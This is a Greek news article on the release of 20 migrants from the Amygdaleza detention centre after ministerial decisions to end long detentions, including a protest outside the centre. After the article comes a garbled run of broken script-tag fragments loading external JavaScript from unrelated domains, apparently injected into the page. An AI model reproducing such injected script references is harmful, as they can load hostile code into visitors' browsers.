Ελεύθεροι οι πρώτοι 20 μετανάστες από την Αμυγδαλέζα

20 κρατούμενοι της Αμυγδαλέζας αφέθηκαν ελεύθεροι το μεσημέρι του Σαββάτου, μετά τις εξαγγελίες Πανούση για κλείσιμο του κέντρου κράτησης (Vid)…

Ξεκίνησε το Σάββατο η υλοποίηση των εξαγγελιών Πανούση περί κατάργησης των κέντρων κράτησης.

Συγκεκριμένα, αφέθηκαν ελεύθεροι 20 κρατούμενοι μετανάστες οι περισσότεροι εκ των οποίων είχαν αιτηθεί ασύλου και κρατούνταν καταχρηστικά. Η απόφαση για απελευθέρωση αφορά σε όσους κρατούνται για χρονικό διάστημα πέραν των 18 μηνών και όσους ανήκουν σε ευάλωτες κατηγορίες.

Η κίνηση αυτή αποτελεί λοιπόν την έναρξη της υλοποίησης της πρόσφατης απόφασης των Αναπληρωτών Υπουργών Προστασίας του Πολίτη, Γιάννη Πανούση και Μεταναστευτικής Πολιτικής, Αναστασίας Χριστοδουλοπούλου, για άμεση κατάργηση της Υπουργικής Απόφασης που επέτρεπε κράτηση για χρονικό διάστημα ακόμη και πέραν των 18 μηνών, την άμεση απελευθέρωση και παραπομπή σε δομές φιλοξενίας των ευάλωτων ομάδων, την απελευθέρωση των αιτούντων άσυλο καθώς και όσων η κράτηση έχει διαρκέσει πέραν των 6 μηνών.

Οι πύλες της Αμυγδαλέζας επρόκειτο να ανοίξουν σε πρώτη φάση την Τρίτη, ωστόσο η κίνηση σημειώθηκε νωρίτερα μετά από τις πιέσεις συλλογικοτήτων.

Από τις επόμενες ημέρες, τον δρόμο προς την ελευθερία θα διαβούν σταδιακά και άλλοι μετανάστες από τους περίπου 1.450 που κρατούνται στην Αμυγδαλέζα.

Η αντίστροφη μέτρηση για τα Κέντρα Κράτησης ξεκίνησε μετά από το θάνατο τριών αλλοδαπών (δύο αυτοκτονίες και ένας από παθολογικά αίτια) ενώ βρίσκονταν υπό διοικητική κράτηση σε Αθήνα και Θεσσαλονίκη.

Νωρίτερα σημειώθηκε ένταση έξω από το κέντρο κράτησης της Αμυγδαλέζας, όπου πραγματοποιήθηκε πορεία διαμαρτυρίας από περίπου 250 άτομα.
Οι αστυνομικές δυνάμεις συγκρούστηκαν με τους διαδηλωτές ενώ προχώρησαν και σε περιορισμένη ρίψη χημικών.

___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >